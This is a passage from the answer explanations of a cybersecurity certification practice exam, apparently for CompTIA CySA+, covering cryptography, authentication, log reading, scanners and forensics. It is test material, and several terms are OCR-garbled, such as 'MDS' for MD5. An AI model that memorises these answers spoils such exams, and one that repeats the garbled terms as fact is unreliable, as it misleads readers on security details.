(cn) nodes. This is the proper location for an organizational unit (ou) node. Active Direc- 
tory (ad) is a type of LDAP server. 


110. C. The sender of a message should encrypt that message using the public key of the mes- 
sage recipient. In this case, Alice should encrypt the message using Bob’s public key. 


111. D. The recipient of a message should decrypt the message using his or her own private 
key. In this case, Bob should decrypt the message using his own private key. 


112. B. The party creating a digital signature uses his or her own private key to encrypt the 
message digest. In this case, Alice should create the signature using her own private key. 


113. A. Anyone who receives a digitally signed message may verify the digital signature by 
decrypting it with the signer’s public key. 


114. D. Nonrepudiation is a cryptographic goal that prevents the signer of a message from 
later claiming that the signature is not authentic. Digital signatures provide nonrepudia- 
tion. They do not provide confidentiality. Accountability and availability are not crypto- 
graphic goals. 


115. B. While configuration management or automated patching would address this issue, 
these are not feasible approaches because Sam does not have the ability to log into the 
device. Intrusion prevention would add a layer of security, but it does not directly address 
the issue of operating system patching. Vulnerability scanning would allow Sam to detect 
missing patches and follow up with the vendor. 


116. B. From this information, the only valid conclusion that Val can reach is that there is a 
properly functioning network path between her system and the remote web server. She 
can’t draw any conclusions about the functioning of the web server from this information. 
The latency is around 17 milliseconds, which is not excessive, and the ping results do not 
show any packet loss. 


117. B. The entity that operates the service requested by the end user is known as the service 
provider (SP). 


118. A. Data ownership policies clearly state the ownership of information created or used 
by the organization. Data classification policies describe the classification structure used 
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by the organization and the process used to properly assign classifications to data. Data 
retention policies outline what information the organization will maintain and the length 
of time different categories of information will be retained prior to destruction. Account 
management policies describe the account life cycle from provisioning through active use 
and decommissioning. 


B. Address space layout randomization (ASLR) rearranges memory locations in a ran- 
domized fashion to prevent attacks that rely upon knowledge of specific memory location 
use. Data execution prevention (DEP) prevents the execution of malware loaded into the 
data space of memory. DLP and EMEA are not EMET features. 


B. The use of a smartphone authenticator app demonstrates possession of the device and 
is an example of “something you have.” When combined with a password (“something 
you know”), this approach provides multifactor authentication. 


C. The agile method divides work into short working sessions, called sprints, that can 
last from a few days to a few weeks. 


B. The diagram already shows a firewall in place on both sides of the network connec- 
tion. Ian should place a VPN at the point marked by ?s to ensure that communications 
over the Internet are encrypted. IPS and DLP systems do provide added security controls, 
but they do not provide encrypted network connections. 


D. FTK, EnCase, and Helix are all examples of forensic suites. Burp is an interception 
proxy used in penetration testing and web application testing. 


C. The fact that the user connected with an account belonging to an administrative 
assistant and was then able to execute administrative commands indicates that a privilege 
escalation attack took place. While buffer overflows are a common method of engaging 
in privilege escalation attacks, there is no evidence in the scenario that this technique was 
used. 


B. Vulnerability scanning would not serve as a compensating control because it would 
only detect, rather than correct, security flaws. There is no indication that encryption is 
not in place on this server or that it would address a SQL injection vulnerability. Both an 
intrusion prevention system (IPS) and a web application firewall (WAF) have the ability to 
serve as a compensating control and block malicious requests. Of the two, a web applica- 
tion firewall would be the best solution in this case because it is purpose-built for protect- 
ing against the exploitation of web application vulnerabilities. 


C. User acceptance testing (UAT) verifies that code meets user requirements and is typi- 
cally the last phase of application testing before code is released to production. 


B. Logical controls are technical controls that enforce confidentiality, integrity, and avail- 
ability in the digital space. This control meets that definition. Physical controls are security 
controls that impact the physical world. Administrative controls are procedural mecha- 
nisms that an organization follows to implement sound security management practices. 
There is no indication given that this control is designed to compensate for a control gap. 
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B. The tool shown is ZAP, a popular application proxy tool. ZAP is an interception proxy 
that allows many types of application testing, such as the fuzz testing (or fuzzing) shown 
in the image. ZAP does not perform static analysis or vulnerability scanning, and there is 
no indication that Sam’s test was performed as a component of peer review. 


A. Host firewalls operate at the individual system level and, therefore, cannot be used to 
implement network segmentation. Routers and switches may be used for this purpose by 
either physically separating networks or implementing VLAN tagging. Network firewalls 
may also be used to segment networks into different zones. 


B. The destination of the traceroute appears in the first line of the results: 
traceroute to d3ag4hukkh62yn.cloudfront.net (52.84.61.25), 
64 hops max, 52 byte packets. 


A. The address of the default gateway on Maddox’s system will appear as the first hop in 
the traceroute results. In this case, it is 192.168.1.1. 


D. The first three IP addresses in the traceroute results are all private IP addresses, 


indicating that the systems are on Maddox’s local network. The first public address that 
appears in the list is 68.66.73.118. 


A. Asterisks appear in traceroute results when the remote intermediate system does not 
respond to the traceroute requests. This is common in traceroute results, and Maddox 
should not read any significance into it. 


D. Data retention policies describe what information the organization will maintain and 
the length of time different categories of information will be retained prior to destruction, 
including both minimum and maximum retention periods. Data classification would be 
covered by the data classification policy. 


C. All of the services shown on the TCPView results are standard Windows services that 
would appear on any Windows server, with one exception. sqlservr.exe is a process 
associated with Microsoft SQL Server and would be found only on a database server. 


D. All of the tools listed have forensic imaging capabilities, but dd is a disk duplicating 
tool that is built into most Linux systems. 


C. Bobbi is adopting a physical, not logical, isolation strategy. In this approach, known 
as air gapping, the organization uses a stand-alone system for the sensitive function that 
is not connected to any other system or network, greatly reducing the risk of compromise. 
VLAN isolation and network segmentation involve a degree of interconnection that is not 
present in this scenario. 


D. The waterfall model follows a series of sequential steps, as shown here. The agile 
software development methodology is characterized by multiple sprints, each producing a 
concrete result. The spiral model uses multiple passes through four phases, resulting in a 
spiral-like diagram. Rapid application development uses a five-phase approach in an 
iterative format. 
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C. The greatest weakness inherent in RADIUS is that it uses the insecure MDS hash func- 
tion for the transmission of passwords over the network. Hashing or encryption of stored 
passwords does not address this risk, but tunneling RADIUS communications over an 
encrypted network connection does mitigate the issue. 


C. Ina SAML transaction, the user initiates a request to the relying party, who then redi- 
rects the user to the SSO provider. The user then authenticates to the SAML identity pro- 
vider and receives a SAML response, which is sent to the relying party as proof of identity. 


A. After a user authenticates to an identity provider, the identity provider creates a secu- 
rity token and provides it to the end user, who may then use it to authenticate to a service 
provider. 


A. The error indicates that the certificate authority that signed the certificate is not 
trusted. This is often the result when an organization self-signs a digital certificate. Ty can 
resolve this error by purchasing a certificate from a trusted third-party CA. 


D. FTK is a suite of forensic tools, not a web application firewall. CloudFlare, FortiWeb, 
and NAXSI are all web application firewall products. 


A. The continual service improvement (CSI) activity in ITIL is designed to increase the 
quality and effectiveness of IT services. It is the umbrella activity that surrounds all other 
ITIL activities. 


C. CheckPoint, Palo Alto, and Juniper are all suppliers of network firewalls. FireEye pro- 
vides endpoint protection and other advanced threat mitigation tools but does not provide 
network firewalls. 


C. The Fagan inspection is a highly formalized, rigorous code review process that 
involves six phases. Pair programming, over-the-shoulder reviews, and pass-around code 
reviews are all examples of lightweight, fairly informal code review processes. 


A. Pair programming is an agile software development technique that places two develop- 
ers at one workstation. One developer writes code, while the other developer reviews their 
code as they write it. Over-the-shoulder code review also relies on a pair of developers 

but rather than requiring constant interaction and hand-offs, over-the-shoulder requires 
the developer who wrote the code to explain the code to the other developer. Pass-around 
code review, sometimes known as email pass-around code review, is a form of manual 
peer review done by sending completed code to reviewers who check the code for issues. 
Tool-assisted code reviews rely on formal or informal software-based tools to conduct 
code reviews. 


D. Framework Profiles describe how a specific organization might approach the security 
functions covered by the Framework Core. The Framework Core is a set of five security 
functions that apply across all industries and sectors: identify, protect, detect, respond, 
and recover. The Framework Implementation Tiers assess how an organization is posi- 
tioned to meet cybersecurity objectives. 
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D. The en1 interface is the only interface that has an active, valid IP address (10.0.1.77) 
that may be used for network communication. The lo0 interface also has an IP address 
(127.0.0.1), but this is the loopback address, used to communicate with the local host, not 
on a network. 


C. The interface shown in the picture is Splunk, a SIEM that specializes in visual search 
and allows analysts to comb through massive quantities of information in an intuitive 
way. Kiwi and other Syslog tools allow the collection and analysis of this information 
but do not provide the visual interface used in Splunk. Sysinternals does not include a log 
analysis tool. 


A. Acunetix is a web application vulnerability scanner. Of the flaws listed, only cross-site 
scripting is a web application vulnerability that the scanner would likely detect. 


A This packet uses the DNS protocol, as shown in the protocol column of the packet. This 
indicates that it is part of a name resolution request. The payload of the packet shows a 
query but not a response, so this packet is a request for name resolution. 


D. ISO 27001 is a voluntary standard, and there is no law or regulation requiring that 
healthcare organizations, financial services firms, or educational institutions adopt it. 


C. In the OAuth framework, the servers that provide services to end users are known as 
resource servers. The web service run by Ursula’s organization would use resource servers 
to provide the service to end users. 


B. Security information and event management (SIEM) systems aggregate security logs, 
configuration data, vulnerability records, and other security information and then allow 
analysts to correlate those entries for important results. Data loss prevention (DLP) tools 
and intrusion prevention systems (IPS) are sources of security information but do not per- 
form aggregation and correlation. Customer relationship management (CRM) systems are 
a business application used to assist in the sales process. 


A. Physical security controls are those controls that impact the physical world. Door 
locks, biometric door controllers, and fire suppression systems all meet this criteria. Net- 
work firewalls prevent network-based attacks and are an example of a logical/technical 
control. 


C. NIST’s Special Publication 800-63-3, “Digital Authentication Guideline,” suggested 
that SMS authentication factors be deprecated in 2016 because of the number of ways in 
which attackers could gain access to SMS messages, including VoIP redirects, 

specific attacks on unencrypted SMS messages, and other means. 


B. As stated in the question, Orizon performs a review of Java classes, indicating that it is 
performing a source code review. Techniques that perform source code review are grouped 
into the category of static code analyzers. The other testing techniques listed in this ques- 
tion are all examples of dynamic code analysis, where the testing application actually 
executes the code. 
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B. It is sometimes difficult to distinguish between cases of least privilege, separation of 
duties, and dual control. Least privilege means that an employee should only have the 
access rights necessary to perform their job. While this may be true in this scenario, you 
do not have enough information to make that determination because you do not know 
whether access to the database would help the security team perform their duties. Separa- 
tion of duties occurs when the same employee does not have permission to perform two 
different actions that, when combined, could undermine security. That is the case here 
because a team member who had the ability to both approve access and access the data- 
base may be able to grant themselves access to the database. Dual control occurs when 
two employees must jointly authorize the same action. Security through obscurity occurs 
when the security of a control depends upon the secrecy of its mechanism. 


D. The $ character does not necessarily represent a security issue. The greater-than/less- 
than brackets (<>) are used to enclose HTML tags and require further inspection to deter- 
mine whether they are part of a cross-site scripting attack. The single quotation mark (') 
could be used as part of a SQL injection attack. 


C. The Center for Internet Security (CIS) publishes a widely respected set of configura- 
tion standards and benchmarks for operating systems and popular applications. The CIS 
benchmarks would be an excellent starting point for securing Dave’s web server. 


C. Succession planning and cross-training both serve to facilitate continuity of operations 
by creating a pool of candidates for job vacancies. Of these, only cross-training encom- 
passes actively involving other people in operational processes, which may also help detect 
fraud. Dual control and separation of duties are both controls that deter fraud, but they 
do not facilitate the continuity of operations. 


C. The fact that the SHA hash value from Friday is identical to the value from Wednesday 
indicates that the file is identical. 


Maureen is designing an authentication system upgrade for her organization. The organi- 
zation currently uses only password-based authentication and has been suffering a series 
of phishing attacks. Maureen is tasked with upgrading the company’s technology to better 
protect against this threat. 


C. Passwords, which are already used by the organization are a “something you know” 
factor. Adding a PIN or security question simply adds another “something you know” 
factor, failing to achieve Maureen’s goal of multifactor authentication. Increasing the com- 
plexity of passwords makes them stronger but does not add an additional factor. Using 
smartcards adds a “something you have” factor, achieving multifactor authentication. 


C. SMS is no longer considered secure and NIST’s Special Publication 800-63-3, “Digital 
Authentication Guideline,” recommends that SMS be deprecated. Not only have success- 
ful attacks against SMS-based one-time passwords increased, but there are a number of 
ways that it can be successfully targeted with relative ease. HOTP tokens, TOTP tokens, 
and soft tokens are all acceptable alternatives. 
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B. Context-based authentication allows authentication decisions to be made based on 
information about the user, the system the user is connecting from, or other information 
that is relevant to the system or organization performing the authentication. Maureen 
already added multifactor authentication to the network. Dual authentication is used 

to implement the dual control concept, which is not a stated objective here. There is no 
indication that Maureen intends to implement biometric authentication. 


D. The operational view describes how a function is performed or what it accomplishes. 
This view typically shows how information flows in a system. The technical view focuses 
on the technologies, settings, and configurations used in an architecture. The logical view 
describes how systems interconnect. The firewall view is not a standard architectural 
view. 


B. Compensating controls must be above and beyond other requirements. Jane is already 
required to lock users out after six incorrect login attempts, deploy multifactor authenti- 
cation, and require the use of alphanumeric passwords by other provisions of PCI DSS. 
Limiting logins to the local console would restrict network access to the system and seems 
to be a reasonable compensating control. 


B. If the standard is not being used, Gina should retire it so that it is not cluttering the 
policy repository and running the risk of becoming outdated. By archiving the standard, 
she can revisit it if needed in the future without investing the work of updating or review- 
ing the standard in the meantime. 


C. User acceptance testing (UAT) is typically the last type of testing performed, and it is 
generally the only software testing that involves end users. 


D. OAuth is a federated identity service that focuses on providing authorization services 
and is designed for use on the web. OpenID is also a federated solution for the web, but 
it provides only authentication and not authorization. Kerberos and Active Directory are 
more suitable for enterprise use. 


C. OAuth is commonly used to provide authentication for APIs and allows interoperation 
with many service providers who support it. RADIUS and TACACS+ are more commonly 
used to provide AAA services for network devices, while SAML is an XML-based stan- 
dard that is often used to provide single sign-on to websites. 


A. Regression testing focuses on evaluating whether a change made to an environment 
introduces other unintended consequences. Therefore, it would be the best way for Haley 
to evaluate the overall impact of applying the security patch to the application. 


B. The kaizen continuous improvement approach is often used in manufacturing and 
in lean programming. It places the responsibility for improvement in the hands of all 
employees rather than assigning it to an individual. 


D. The Kerberos protocol is designed for use over insecure networks and uses strong 
encryption to protect authentication traffic. RADIUS, TACACS, and TACACS+ all con- 
tain vulnerabilities that require the use of additional encryption to protect their traffic. 
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D. The diagram shows that there are two nonredundant components in this network: the 
distribution router and the edge switches. A failure of either of those devices would cause 
a network outage, as there is no redundant system ready to assume the workload. 


C. Secure Sockets Layer (SSL), Transport Layer Security (TLS), and virtual private net- 
works (VPNs) are all used to protect data in motion. AES cryptography may be used to 
protect data at rest. SSL is no longer considered secure, so it is not a good choice for Greg. 
The only answer choice that matches each tool with the appropriate type of information 
and does not use SSL is using TLS for data in motion and AES for data at rest. 


D. aircrack-ng is a suite of wireless security tools that would be perfectly suited for 
Francine’s WiFi security assessment. 


B. When using OpenLDAP, the SSHA password storage scheme uses a salted SHA hash 
for password storage. This is stronger than the CRYPT, MDS, SHA, and SASL schemes 
that OpenLDAP supports. 


D. Context-based authentication systems commonly take location, time of day, and 
user behavior into account. They do not normally consider the complexity of the user’s 
password. 


B. Firewall logs typically contain similar information to that contained in NetFlow 
records. However, the firewall does not always have the same access to network traffic as 
the switches and routers that generate NetFlow information. While not a complete substi- 
tute, firewall logs do offer a good compensating control for the lack of NetFlow records. 
Routers and switches do not typically record traffic records in their standard logs. This 

is the function of NetFlow, which is unavailable on this network. Intrusion prevention 
systems (IPS) do not record routine traffic information. 


A. The OpenSSL tool, despite its name, provides both SSL and TLS implementations. 
It is the most widely used implementation of both SSL and TLS in use today. OpenTLS, 
SecureSSL, and SecureI'LS are nonexistent tools. 


B. Syslog severity ranges from 0 (emergency) down to 7 (debug), with lower numbers rep- 
resenting higher severities. The value of 2 corresponds to a critical severity error. 


D. Fuzz testing involves sending invalid or random data to an application to test its ability 
to handle unexpected data. Fault injection directly inserts faults into error handling paths, 
particularly error handling mechanisms that are rarely used or might otherwise be missed 
during normal testing. Mutation testing is related to fuzzing and fault injection but rather 
than changing the inputs to the program or introducing faults to it, mutation testing 
makes small modifications to the program itself. Stress testing is a performance test that 
ensures applications and the systems that support them can stand up to the full produc- 
tion load. 


B. Of the solutions presented, a passcode sent via SMS to a cell phone is the best option. 
The designer of the system should take care to ensure that the code is sent directly to a 
number controlled by a mobile carrier and not to a VolIP-enabled line to prevent man-in- 
the-middle attacks. Security questions are not considered strong authentication as they 
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may often be answered by someone other than the individual. Emailing a link to a pass- 
word reset web page would not work because if the user does not have access to his or 

her central authentication account, he or she would not likely be able to receive the email. 
Similarly, the two-factor authentication option presented would not work because the user 
has presumably forgotten his or her password. 


B. John the Ripper is a password cracking tool used to retrieve plain-text passwords from 
hashed password stores. 


C. The first entry in the log indicates that the user authenticated from the system 
10.174.238.88. 


C. The second log entry indicates that the sshd daemon handled the connection. This 
daemon supports the Secure Shell (SSH) protocol. 


B. The first log entry indicates that the user made use of public key encryption to authen- 
ticate the connection. The user, therefore, possessed the private key that corresponded to a 
public key stored on the server and associated with the user. 


B. The identity of the user making the connection appears in the first log entry: 
accepted publickey for ec2-user. The third log entry that contains the string 
USER=root is recording the fact that the user issued the sudo command to create an inter- 
active bash shell with administrative privileges. This is not the account used to create the 
server connection. The pam_unix entry indicates that the session was authenticated using 
the pluggable authentication module (PAM) facility. 


B. The user at this IP address is requesting the robots.txt file. This file is generally only 
requested by automated crawlers, such as those operated by search engines, seeking to 
determine whether they are permitted to browse the site. 


C. The requests from this IP address appear to be normal requests for a web page and 
two associated image files. There is no indication that this comes from any source other 
than a normal user. 


D. From the information presented, Maggie cannot identify any insecure or outdated 
components. There is no evidence in the logs that the server is running SSL, and the TLS 
version referenced in the logs (version 1.2) is indeed current. The fact that the file is 
named ssl_request_log does not mean that the server necessarily supports SSL, as TLS 
records are stored in that file as well. The cipher suite specified in the logs (ECDHE-RSA- 
AES256-SHA384 and ECDHE-RSA-AES256-GCM-SHA384) contain no insecure or 
outdated components. 


A. All of the connections recorded in these log entries make use of TLS-encrypted con- 
nections. This does not, however, allow Maggie to reach the conclusion that the server 
prohibits unencrypted connections because Maggie is reviewing the ssl_requests_log 
file, which would not contain information about unencrypted connections. The server 
does appear to allow web crawlers, as shortly after the system from 157.55.39.18 requests 
the robots.txt file, another system from the same subnet requests the front page of the 
site. There is not enough information in this log file to draw conclusions about network 
access restrictions. 
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D. Endpoint security suites typically include host firewalls, host intrusion prevention 
systems (IPS), and antimalware software. Virtual private network (VPN) technology is 
normally a core component of the operating system or uses software provided by the VPN 
vendor. 


D. Lean Six Sigma is a process improvement approach that includes streamlining pro- 
cesses to make them more effective. Regression testing is a type of software/system testing 
used during the QA process. Waterfall and agile are software development methodologies. 


D. The Qualys vulnerability scanner is a widely used, commercial vulnerability scanning 
product. OpenVAS is also a network vulnerability scanner, but it is an open source project 
rather than a commercial product. 


A. The Microsoft Baseline Security Analyzer (MBSA) is a Microsoft-provided tool used 
specifically to scan the security settings on Windows devices. 


C. Nikto is an open source web vulnerability scanner. Acunetix is also a web vulnerabil- 
ity scanner, but it is a commercial product. OpenVAS is an open source vulnerability scan- 
ner, but it is not dedicated to web application scanning. Nexpose is a commercial network 
vulnerability scanner. 


C. Cacti, Nagios, and MRTG are all open source network monitoring tools, while Solar- 
winds is a commercial alternative. 


A. Syslog provides a standardized logging facility that works across a wide variety of 
operating systems and devices. Event Viewer and SCCM are Microsoft-specific technolo- 
gies, while Prime is a Cisco-specific technology. 


C. Security through obscurity is not a good practice. You should not rely upon the 
secrecy of the control (e.g., the location of the web interface) as a security measure. 
Therefore, obscuring web interface locations is not included on the OWASP security 
controls list. 


B. The result shows a different hash value for the same file on two different runs. This 
means that the file was definitely modified between the two runs of shasum. If the file 
were intact, the two values would be identical. If the file were removed, Javier would 
receive an error on the second run. 


D. Identities are used as part of the authentication, authorization, and accounting (AAA) 
framework that is used to control access to computers, networks, and services. AAA 
systems authenticate users by requiring credentials such as a username, a password, and 
possibly a biometric or token-based authenticator. Once individuals have proven who they 
are, they are then authorized to access or use resources or systems. Authorization applies 
policies based on the user’s identity information and rules or settings, allowing the owner 
of the identity to perform actions or to gain access to systems. The accounting element 

of the AAA process is the logging and monitoring that goes with the authentication and 
authorization. Accounting monitors usage and provides information about how and what 
users are doing. 
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C. Tim should set the secure attribute on the cookie to ensure that it is always sent over 
an encrypted connection. Merely using SSL or TLS for the web application does not 
ensure that the cookie itself is always sent over an encrypted connection. Hashing the 
cookie value would not have any effect on the security of the application. 


A. Rootkits combine multiple malicious software tools to provide continued access to a 
system while hiding their own existence. Fighting rootkits requires a full suite of system 
security practices, ranging from proper patching and layered security design to antimal- 
ware techniques such as whitelisting, heuristic detection, and malicious software detection 
tools. 


A. Unfortunately, the RADIUS protocol supports only the weak MDS hash function. 
This is one of the major criticisms of RADIUS. 


C. Laura can determine that the nytimes.com domain uses Google for email services, 

as there is a mail exchanger (MX) record pointing to a Google address and routing 

mail for the domain to Google. The server located at 66.205.160.99 is the server that 
answered this DNS query, which is not necessarily operated by the nytimes.com domain. 
The results appear to show that there are multiple web servers hosting the nytimes.com 
domain but there is no evidence that Google Analytics is used in these results. 


A. All of these information sources may provide clues to the identity of the individual who 
installed the software. However, the server logs are likely to contain records of software 
installation and associate them with a user ID. This is the source that is most likely able to 
provide the most direct answer to Cody’s question in the shortest possible time period. 


B. The unauthorized use of computing resources is normally a violation of an organiza- 
tion’s acceptable use policy. It is quite unlikely that the organization has a specific policy 
that addresses the mining of Bitcoin or other cryptocurrencies. Information classification 
and identity management policies generally do not address misuse of resources. 


D. Configuration management tools are able to detect the installation of new software, 
helping analysts quickly identify cases of unauthorized software installation. Authentica- 
tion anomaly detection and intrusion prevention controls are unlikely to detect this issue 
because the employee likely does have authorization to connect to the server and is simply 
misusing authorized access privileges. The installation of software that does not listen on 
a network port, such as cryptocurrency mining software, is unlikely to be detected with 
vulnerability scanning. 


C. Xavier could address this issue by hiring an external security-as-a-service (SECaaS) 
provider that specializes in malware analysis. Infrastructure (IaaS), platform (PaaS) and 
identity management (IDaaS) services would not provide malware analysis capabilities. 


C. Imperva, NAXSI, and ModSecurity are all web application firewall options that Glenn 
should consider. Network General is a former manufacturer of network analysis equip- 
ment that was acquired by NetScout in 2007. Bafflingly, Network General is still included 
on the CompTIA CySA+ objectives as required knowledge. 


D. Fuzz testing works by dynamically manipulating input to an application in an effort 
to induce a flaw. This technique is useful in detecting places where a web application does 
not perform proper input validation. It can also be used against XML input, TCP/IP 
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communications and other protocols. Fuzz testing is not commonly used against firewall 
rules. Note that this question mentions the Untidy fuzzer. This product was an XML 
fuzzer that no longer exists because it was folded into the Peach fuzzing tool. However, 
CompTIA included it as an exam objective for the CySA+ exam. Therefore, you should 
associate the name with XML fuzz testing if you see it on the exam. 


C. While all of these control documents may contain information helpful to Lynda, the 
application software security control is the one most likely to contain information relevant 
to incorporating security into the SDLC. 
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B. The sudden drop to zero is most likely to be an example of link failure. A denial-of- 
service attack could result in this type of drop but is less likely for most organizations. 
High bandwidth consumption and beaconing both show different traffic patterns than 
shown in this example. 


C. This is fundamentally a dispute about data ownership. Charlotte’s co-worker is assert- 
ing that her department owns the data in question, and Charlotte disagrees. While the 
other policies mentioned may have some relevant information, Charlotte should first turn 
to the data ownership policy to see whether it reinforces or undermines her co-worker’s 
data ownership claim. 


B. During an incident recovery effort, patching priority should be placed upon systems 
that were directly involved in the incident. This is one component of remediating known 
issues that were actively exploited. 


B. Signature-based attack detection methods rely on knowing what an attack or malware 
looks like. Zero-day attacks are unlikely to have an existing signature, making them a 
poor choice to prevent them. Heuristic (behavior) detection methods can indicate compro- 
mises despite the lack of signatures for the specific exploit. Leveraging threat intelligence 
to understand new attacks and countermeasures is an important part of defense against 
zero-day attacks. Building a well-designed and segmented network can limit the impact of 
compromises or even prevent them. 


D. The Windows registry, Master File Tables, and INDX files all contain information 
about files, often including removed or deleted files. Event logs are far less likely to 
contain information about a specific file location. 


C. Since Emily’s organization uses WPA2 enterprise, users must authenticate to use 
the wireless network. Associating the scan with an authenticated user will help incident 
responders identify the device that conducted the scan. 


A. Normally, forensic images are collected from systems that are offline to ensure that a 

complete copy is made. In cases like this where keeping the system online is more impor- 

tant than the completeness of the forensic image, a live image to an external drive using a 
portable forensic tool such as FTK Imager Lite, dd, or similar is the correct choice. 
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B. Accidental threats occur when individuals doing their routine work mistakenly per- 
form an action that undermines security. In this case, Maria’s actions were an example of 
an accident that caused an availability issue. 


A. When nmap returns a response of “filtered,” it indicates that nmap cannot tell whether 
the port is open or closed. Filtered results are often the result of a firewall or other 
network device, but a response of filtered does not indicate that a firewall or IPS was 
detected. When nmap returns a “closed” result, it means that there is no application 
listening at that moment. 


D. Despite that vulnerability scanning is an important security control, HIPAA does not 
offer specific requirements for scanning frequency. However, Darcy would be well advised 
to implement vulnerability scanning as a best practice, and daily or weekly scans are 
advisable. 


C. The likeliest issue is a problem with the NTP synchronization for both of the hosts, 
because of an improperly set time zone or another time issue. The ruleset only allows traf- 
fic initiated by host A, making it impossible for host B to be the source of a compromise of 
A. The other answers are possible, but the most likely issue is an NTP problem. 


D. The most serious vulnerabilities shown in this report are medium-severity vulnerabili- 
ties. Server D has the highest number (8) of vulnerabilities at that severity level. 


C. When an event of the type that is being analyzed has occurred within the recent past 
(often defined as a year), assessments that review that event will normally classify the 
likelihood of occurrence as high since it has already occurred. 


C. The CEO’s suggestion is a reasonable approach to vulnerability scanning that is used 
in some organizations, often under the term continuous scanning. He should consider 
the request and the impact on systems and networks to determine a reasonable course of 
action. 


B. This is an example of an availability issue. If data had been modified, it would have 
been an integrity issue, while exposure of data would have been a confidentiality issue. 
Accountability from the outsourced vendor isn’t discussed in the question. 


D. The Technical Report will contain detailed information on a specific host and is 
designed for an engineer seeking to remediate the system. The PCI Technical Report 
would focus on credit card compliance issues, and there is no indication that this server is 
used for credit card processing. The Qualys Top 20 Report and Executive Report would 
contain summary information more appropriate for a management audience and would 
cover an entire network, rather than providing detailed information on a single system. 


D. Bob needs to perform additional diagnostics to determine the cause of the latency. 


Unfortunately for Bob, this chart does not provide enough information to determine 
why the maximum response time rises to high levels on a periodic basis. Since the events 
are not regularly timed, it is relatively unlikely that a scheduled task is causing the issue. 
Network cards do not have latency settings; latency is caused by network traffic, system 
response times, and similar factors. Increasing the speed of a network link may help with 
latency, but you do not have enough information to make that determination. 
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C. This image shows a SYN-based port scan. The traffic is primarily made up of TCP 
SYN packets to a variety of common ports, which is typical of a SY N-based port scan. 


A. RADIUS sends passwords that are obfuscated by a shared secret and MDS hash, 
meaning that its password security is not very strong. RADIUS traffic between the 
RADIUS network access server and the RADIUS server is typically encrypted using IPsec 
tunnels or other protections to protect the traffic. Kerberos and TACACS+ are alternative 
authentication protocols and are not required in addition to RADIUS. SSL is no longer 
considered secure and should not be used to secure the RADIUS tunnel. 


B. The most likely cause of this slowness is an incorrect block size. Block size is set using 
the bs flag and is defined in bytes. By default, dd uses a 512-byte block size, but this is far 
smaller than the block size of most modern disks. Using a larger block size will typically 
be much faster, and if you know the block size for the device you are copying, using its 
native block size can provide huge speed increases. This is set using a flag like bs = 64k. 
The if and of flags adjust the input and output files, respectively, but there is no indica- 
tion that these are erroneous. The count flag adjusts the number of blocks to copy and 
should not be changed if Jake wants to image the entire disk. 


B. A honeypot is used by security researchers and practitioners to gather information 
about techniques and tools used by attackers. A honeypot will not prevent attackers from 
targeting other systems, and unlike a tarpit, it is not designed to slow down attackers. 
Typically, honeypot data must be analyzed to provide useful information that can be used 
to build IDS and IPS rules. 


B. Advanced persistent threats (APTs) are highly skilled attackers with advanced capabili- 
ties who are typically focused on specific objectives. To accomplish those objectives, they 
often obtain and maintain long-term access to systems and networks using powerful tools 
that allow them to avoid detection and to stay ahead of responders who attempt to remove 
them. 


B. Of these choices, the most useful metric would be the time required to resolve criti- 

cal vulnerabilities. This is a metric that is entirely within the control of the vulnerability 
remediation program and demonstrates the responsiveness of remediation efforts and 

the time that a vulnerability was present. The number of vulnerabilities resolved and the 
number of new vulnerabilities each month are not good measures of the program’s effec- 
tiveness because they depend upon the number of systems and services covered by the scan 
and the nature of those services. 


C. By default nmap scans 1,000 of the most common TCP ports. Mike only knows that 
the system he scanned had no reachable (open, filtered, or closed) TCP ports in that list. 


D. Once they are connected via a write blocker, a checksum is created (often using MD5 
or SHA1). If this hash matches the hash of forensic images, they exactly match, meaning 
that the drive’s contents were not altered and that no files were added to or deleted from 
the drive. 


C. While BIOS infections are relatively rare, some malware does become resident in the 
system’s firmware or BIOS. Once there, analysis of the hard drive will not show the infec- 
tion. If the desktop support team at Ben’s company has fully patched the system and no 
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other systems are similarly infected, Ben’s next step should be to validate that elements of 
the system he did not check before, such as the BIOS, are intact. 


C. Wireshark includes the ability to export packets. In this case, Susan can select the 
GIF89a detail by clicking that packet and then export the actual image to a file that she 
can view. 


C. Audits are formal reviews of an organization’s security program or specific compli- 
ance issues conducted on behalf of a third party. Audits require rigorous, formal testing of 
controls and result in a formal statement from the auditor regarding the entity’s compli- 
ance. Audits may be conducted by internal audit groups at the request of management or 
by external audit firms, typically at the request of an organization’s governing body or a 
regulator. 


D. Openvas is an open source vulnerability scanning product. Qualys, Nessus, and Nex- 
pose are all vulnerability scanners but are commercial products that require paying license 
fees. 


C. Scanning the full range of TCP ports can be done using a SYN scan (-sS) and declar- 
ing the full range of possible ports (1-65535). Service version identification is enabled with 
the -sV flag. 


A. CompTIA considers patching to be part of the validation effort. This differs from the 
NIST standard process; however, CompTIA considers patching, permission checking and 
setting, scanning, and ensuring that logging is working to be parts of the validation process. 


D. Dan does not need to take any action. This is a very low criticality vulnerability (1/5), 
and it is likely not exploitable from outside the data center. It is not necessary to remediate 
this vulnerability, and there is no indication that it is a false positive report. Overall, this 
is a very clean scan result for a VPN server. 


C. This rule base contains a shadowed rule. The rule designed to deny requests to access 
blocked sites will never trigger because it is positioned below the rule that allows access to 
all sites. Reversing the order of the first two rules would correct this error. There are no 
orphaned rules because every rule in the rule base is designed to meet a security require- 
ment. There are no promiscuous rules because the rules do not allow greater access than 
intended, they are simply in the wrong order. 


C. All of the data sources listed in this question may provide Jay with further information 
about the attack. However, firewall logs would be best positioned to answer his specific 
question about the source of the attack. Since the firewall is performing network address 
translation (NAT), it would likely have a log entry of the original (pre-NAT) source IP 
address of the traffic. 


D. These results show the network path between Jim’s system and the CompTIA web 
server. It is not unusual to see unknown devices in the path, represented by * * * because 
those devices may be configured to ignore traceroute requests. These query results 

do indicate that the network path passes through Chicago, but this does not mean that 
the final destination is in Chicago. There is no indication that the website is down. 
216.182.225.74 is the system closest to Jim in this result, while 216.55.11.62 is the closest 


system to the remote server. 
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D. An uncredentialed scan provides far less information than a credentialed scan or an 
agent-based scan because both credentialed and agent-based scans are able to gather con- 
figuration information from the target systems. External scans also provide less informa- 
tion than internal scans because they are filtered by border firewalls and other security 
devices. Therefore, an uncredentialed external scan would provide the least information. 


B. NIST SP800-88, along with many forensic manuals, requires a complete zero wipe of 
the drive but does not require multiple rounds of wiping. Degaussing is primarily used for 
magnetic media-like tapes and may not completely wipe a hard drive (and may, in fact, 
damage it). Using the ATA Secure Erase command is commonly used for SSDs. 


B. NIST recommends that clock synchronization is performed for all devices to improve 
the ability of responders to conduct analysis, part of the detection and analysis phase of 
